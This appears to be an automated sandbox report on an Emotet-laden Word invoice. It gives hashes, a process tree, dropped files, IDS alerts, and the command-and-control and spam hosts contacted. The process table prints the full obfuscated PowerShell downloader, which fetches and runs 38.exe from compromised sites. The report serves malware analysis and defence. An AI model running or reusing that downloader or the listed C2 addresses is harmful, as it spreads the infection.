File name: | Factura_D99968300.doc |
Full analysis: | https://app.any.run/tasks/4ba8ed14-f290-4d1b-907c-c205672d1899 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 25, 2019, 19:13:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 13:01:00 2019, Last Saved Time/Date: Thu Apr 25 13:01:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
MD5: | 9E28085A88D8FB9CE26A3F6ECD2517E8 |
SHA1: | 987FB5D61A75DA32AF51047433CD444A8088E1D4 |
SHA256: | EB2AEA582CF5C277A3F3AE1CE7C8EB3FF0CC6DDCD5676913CC7EAE2E96F1B622 |
SSDEEP: | 6144:b77HUUUUUUUUUUUUUUUUUUUT52VjSy0h0ZB71y:b77HUUUUUUUUUUUUUUUUUUUTCeyKaB78 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:04:25 12:01:00 |
ModifyDate: | 2019:04:25 12:01:00 |
Pages: | 1 |
Words: | - |
Characters: | 5 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 5 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
4012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura_D99968300.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2060 | powershell -e JABIAGsAQQBHAFEAYwBRAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFEAJwAsACcAawBaAFgAJwApACwAJwBvAGsAJwAsACcAdwBVACcAKQA7ACQAWgBBAEEAawBBAEIAUQAgAD0AIAAnADMAOAAnADsAJABPAEQAawBrAEMAQQBEAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAEEAWABBACcALAAnAEIAJwApACwAJwBBACcAKQAsACcAcgAxACcAKQA7ACQAUgB3AFEAQwBrAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAQQBBAGsAQQBCAFEAKwAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7ACQAcAB3AHgAeABEAEQAawA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAE0AYwBBACcALAAnAGsAJwApACwAJwBVACcALAAnAEEAXwAnACkAOwAkAEUAbwBEAGsAQQAxAEQAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4AYABFAGAAVAAuAFcAZQBCAGMAbABpAGAAZQBOAFQAOwAkAEwAWABYAEMAWgBrAD0AKAAiAHsAMwAxAH0AewAxADgAfQB7ADMAMwB9AHsAMwA0AH0AewAxADMAfQB7ADIAOQB9AHsANAAwAH0AewAyADQAfQB7ADYAfQB7ADIAMwB9AHsAMgAwAH0AewAyADUAfQB7ADIAMQB9AHsAOQB9AHsANQB9AHsAMQA3AH0AewAzADcAfQB7ADMAMAB9AHsAMQA0AH0AewAxADAAfQB7ADEANQB9AHsAMQAxAH0AewAxADIAfQB7ADIAOAB9AHsAMwAyAH0AewA0AH0AewAxAH0AewAzADUAfQB7ADMAfQB7ADEAOQB9AHsAMgA2AH0AewAyADIAfQB7ADMAOQB9AHsAMwA2AH0AewAwAH0AewAyADcAfQB7ADMAOAB9AHsANwB9AHsAMgB9AHsAMQA2AH0AewA4AH0AIgAtAGYAIAAnAGMAJwAsACcALgBjACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcALwAnACwAJwB4AHIAOQAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAG4AJwAsACcAYwBnAGkAJwAsACcALQBiAGkAJwApACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAbQAvAHcAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAaQBvACcALAAnAHAAbAAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwAnACwAJwBwAHMAOgAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbQAnACwAJwAvADMAZwAnACkALAAnAHUAbQAnACkALAAnAC8AJwAsACcALwAnACwAJwB0ACcALAAnAGMAJwAsACcAegAnACwAJwBjAEQALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwAC0AYQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwB3ACcALAAnAG8AbQAnACkAKQAsACcAaQByAC4AJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBvAG0ALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwAC8AZwAnACwAJwBiAG4AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwA2ADAAJwAsACcANAB1ACcAKQApACwAJwBCAGMAJwAsACcALwBkAGEAJwAsACcAcAA6ACcALAAnAC0AcwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBtAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcASgAnACwAJwBTAGMAcwAnACkAKQAsACcALwBAAGgAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBNAFoAJwAsACcALwBAACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaAB0AHQAcAAnACwAJwA6AC8AJwApACwAJwAvADkAMQAnACkALAAnAHAAbAAnACwAKAAiAHsANAB9AHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAJwB5AHQAJwAsACcALwBiAGEAJwAsACcAYQBzACcALAAnAGgALgBjACcAKQAsACcAaAA0AC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAaAB0AHQAcAA6AC8AJwAsACcAQAAnACkALAAnAG8AJwAsACcAbgAvAFUAJwApACwAJwBnACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdABzAC8AJwAsACcARQAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAG4AJwAsACcAYQBwAHMAaABvACcAKQAsACcAaAAxAEcAJwApACwAJwBzAC4AYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwADoALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBAACcALAAnAGgAdAB0ACcAKQApACwAJwBkAG0AJwAsACcAYQAnACwAJwBoAHQAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBoAGkAJwAsACcALwBzACcAKQAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC8AJwAsACcAZAB1AGsAawAnACkALAAnAGEAbgBrACcALAAnAC8AJwApACwAJwAuAGMAJwAsACcAbwAnACwAJwBwAGgAaQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwACcALAAnAHAAcgBlACcAKQAsACcAbwBtACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBnAHIAYQAnACwAJwAyACcAKQAsACcAaQAnACkALgAiAHMAYABwAGwAaQB0ACIAKAAnAEAAJwApADsAJAB6AFgAVQBBAEEAWAA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBAEEAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAEEAQQBBACcAKQAsACcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABZAEQAawBVADEAUQBCAEMAIABpAG4AIAAkAEwAWABYAEMAWgBrACkAewB0AHIAeQB7ACQARQBvAEQAawBBADEARAAuACIARABvAFcATgBgAGwAbwBgAEEARABmAGAAaQBMAGUAIgAoACQAWQBEAGsAVQAxAFEAQgBDACwAIAAkAFIAdwBRAEMAawBBACkAOwAkAFgAMQBVAEEAeAB3AD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBpAEQAVQAnACwAJwBaAF8AQQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUgB3AFEAQwBrAEEAKQAuACIAbABlAGAATgBnAFQASAAiACAALQBnAGUAIAAzADgANAA1ADAAKQAgAHsAJgAoACcASQBuAHYAbwAnACsAJwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAUgB3AFEAQwBrAEEAOwAkAE0AUQBvADQAQQBVAF8AVQA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBAEIAXwAnACwAJwBCAEQAJwApACwAJwBBACcALAAnAFkAJwApADsAYgByAGUAYQBrADsAJABRAEMAWABaAEEAWgA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAWgAnACwAJwBKACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAWABEADEAJwAsACcAYwBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAFoAQQBvAEEAQQBVAEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHoAdwAnACwAJwB3AEMARAAnACkALAAnAEEAQQAnACwAJwBEACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3288 | "C:\Users\admin\38.exe" | C:\Users\admin\38.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1704 | --f33b820f | C:\Users\admin\38.exe | 38.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3380 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 38.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1096 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1404 | "C:\Users\admin\AppData\Local\soundser\XluNc.exe" | C:\Users\admin\AppData\Local\soundser\XluNc.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
572 | --19fda0d7 | C:\Users\admin\AppData\Local\soundser\XluNc.exe | XluNc.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1000 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | XluNc.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1928 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
4012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6434.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MPUDE3UTFU5YBQ4KDU6E.temp | — | |
MD5:— | SHA256:— | |||
2060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
572 | XluNc.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:C269F0952FD0EE6C8AAA2C895B51F1CE | SHA256:C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 | |||
2060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe724d.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2060 | powershell.exe | C:\Users\admin\38.exe | executable | |
MD5:3F5A7865E0EE668A2BFFCA64CBF127CD | SHA256:9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE | |||
4012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:825C45DD10C96600B19CB23B108C989D | SHA256:7C821062FDC859ADBA6F62E919301188567AB7912FBA2458B8EC3C72FE0F88DB | |||
1704 | 38.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:3F5A7865E0EE668A2BFFCA64CBF127CD | SHA256:9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE | |||
1096 | soundser.exe | C:\Users\admin\AppData\Local\soundser\XluNc.exe | executable | |
MD5:C269F0952FD0EE6C8AAA2C895B51F1CE | SHA256:C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 | |||
4012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:59632E735966334D40089A8F9343C66B | SHA256:F74A2105F795B882F9F2E3CDDFD3EF711F30FE38A777A3E6607CE296920D63EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1928 | soundser.exe | GET | — | 31.172.86.183:8080 | http://31.172.86.183:8080/whoami.php | DE | — | — | malicious |
2060 | powershell.exe | GET | 200 | 165.227.97.68:80 | http://dukkank.com/wp-admin/Uh4/ | US | executable | 134 Kb | suspicious |
1928 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/srvc/jit/ | CA | binary | 148 b | malicious |
1928 | soundser.exe | POST | — | 31.172.86.183:8080 | http://31.172.86.183:8080/attrib/xian/ringin/merge/ | DE | — | — | malicious |
1096 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/chunk/glitch/ringin/ | CA | binary | 67.6 Kb | malicious |
1928 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/pnp/ | CA | binary | 705 Kb | malicious |
1928 | soundser.exe | GET | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/whoami.php | US | text | 13 b | malicious |
1928 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/entries/xian/ringin/merge/ | US | binary | 3.29 Kb | malicious |
1928 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/forced/cookies/ringin/ | US | binary | 3.13 Kb | malicious |
1928 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/free/ | US | binary | 3.07 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1928 | soundser.exe | 31.172.86.183:8080 | — | First Colo GmbH | DE | malicious |
1928 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
2060 | powershell.exe | 165.227.97.68:80 | dukkank.com | Digital Ocean, Inc. | US | suspicious |
1928 | soundser.exe | 64.136.44.45:465 | smtp.juno.com | Netzero,INC. | US | unknown |
1928 | soundser.exe | 104.236.185.25:8080 | — | Digital Ocean, Inc. | US | malicious |
1928 | soundser.exe | 191.252.112.195:587 | smtp.mbseventos.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
1928 | soundser.exe | 208.84.244.139:25 | pop.jnd.terra.com.br | Terra Networks Operations Inc. | US | unknown |
1096 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
1928 | soundser.exe | 207.210.229.92:25 | jadisa.com.mx | Colo4, LLC | US | unknown |
1928 | soundser.exe | 207.210.229.92:465 | jadisa.com.mx | Colo4, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
dukkank.com |
| suspicious |
pop.jnd.terra.com.br |
| unknown |
jadisa.com.mx |
| unknown |
smtp.mbseventos.com.br |
| unknown |
mail.jnd.terra.com.br |
| unknown |
smtpout.secureserver.net |
| whitelisted |
smtp.juno.com |
| shared |
smtp.gmail.com |
| shared |
smtp.mail.yahoo.com |
| shared |
serv2.hostingweb-mx.net |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2060 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2060 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2060 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1096 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 17 |
1096 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |